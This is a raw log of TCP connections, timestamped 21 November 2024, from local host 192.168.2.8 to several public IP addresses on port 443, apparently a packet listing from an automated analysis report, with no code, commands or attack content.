                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.607990980 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.608000994 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.608021975 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.624145031 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.624159098 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626544952 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626557112 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626672983 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626688004 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626701117 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626707077 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626728058 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626733065 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626818895 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626836061 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626868010 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626878023 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626895905 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626912117 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626969099 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.626981974 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627067089 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627079964 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627099991 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627113104 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627120018 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627124071 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627136946 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627159119 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627198935 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627217054 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627275944 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627290010 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627309084 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627325058 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627405882 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627417088 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627427101 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627432108 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627453089 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627460957 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627486944 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627501011 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627538919 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627552986 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627561092 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627564907 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627587080 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627605915 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627635002 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627651930 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627656937 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.627660990 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.755760908 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.793943882 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.795201063 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.795274973 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.795332909 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.804467916 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.804480076 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.805119038 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.805134058 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.806221008 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.806276083 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.812299967 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.812464952 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.812519073 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.827894926 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.828207016 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.828226089 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.829332113 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.829406977 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.829701900 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.829766989 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.829852104 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.829859018 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.842628956 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.842679977 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.842808962 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.843729973 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.843749046 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.844317913 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.844386101 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.844450951 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.844598055 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.844613075 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.855392933 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.855483055 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.855655909 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.855732918 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.855752945 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.859338045 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.917061090 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.917073965 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.949433088 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.949533939 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.949616909 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.954737902 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.955120087 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.955127001 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.956801891 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.956871986 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.957825899 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.957910061 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.968061924 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.968261003 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.968270063 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.971930027 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.971991062 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.972281933 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.972393990 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.972486973 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990053892 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990106106 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990139961 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990158081 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990179062 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990195990 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990993023 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991019011 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991787910 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991822004 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991893053 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.992146969 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.992157936 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.011785984 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.011811018 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.011881113 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.118932962 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.118936062 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.119004965 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.223403931 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.223980904 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.224003077 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225169897 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225176096 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225195885 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225203991 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.244312048 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.244391918 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.244843006 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.245193958 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.245210886 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310053110 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310108900 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310179949 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310235977 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310270071 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310357094 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310411930 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310429096 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310626984 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310640097 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317433119 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317490101 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317580938 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317787886 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317814112 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.321882963 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.409728050 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.409774065 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.409857988 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410054922 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410089970 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410267115 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410823107 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410834074 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.411041975 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.411055088 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.105541945 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.105612040 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.105670929 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.105700970 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.105720997 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.105747938 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.108536959 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.108736038 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.108763933 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.109016895 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.109096050 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.109560966 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.109909058 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.109977961 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.110239983 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.155323982 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.188231945 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.188231945 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.188256025 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.188266039 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.295996904 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.296040058 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.296163082 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.296591043 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.296629906 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.296691895 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.297528028 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.297565937 CET44349808172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.297631979 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.297961950 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.297987938 CET44349809172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.298049927 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.298674107 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.298686028 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.298875093 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.298888922 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.299328089 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.299345970 CET44349808172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.299437046 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.299452066 CET44349809172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.554635048 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.554713964 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.554822922 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.554872990 CET49799443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.554893970 CET44349799162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.592690945 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.592792034 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.593291044 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.593305111 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.595655918 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.595671892 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.675024986 CET49811443192.168.2.823.44.203.23
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.675085068 CET4434981123.44.203.23192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.675182104 CET49811443192.168.2.823.44.203.23
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.675347090 CET49811443192.168.2.823.44.203.23
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.675369024 CET4434981123.44.203.23192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.815960884 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.816077948 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.816334963 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.816334963 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.816354990 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.816382885 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.816735983 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.817202091 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.817270041 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.817450047 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.817550898 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.817825079 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.817895889 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.852305889 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.852842093 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.852854967 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.853228092 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.853236914 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.853436947 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.853446007 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.853787899 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.853810072 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.853859901 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.857842922 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.857943058 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.860765934 CET49804443192.168.2.8172.64.41.3
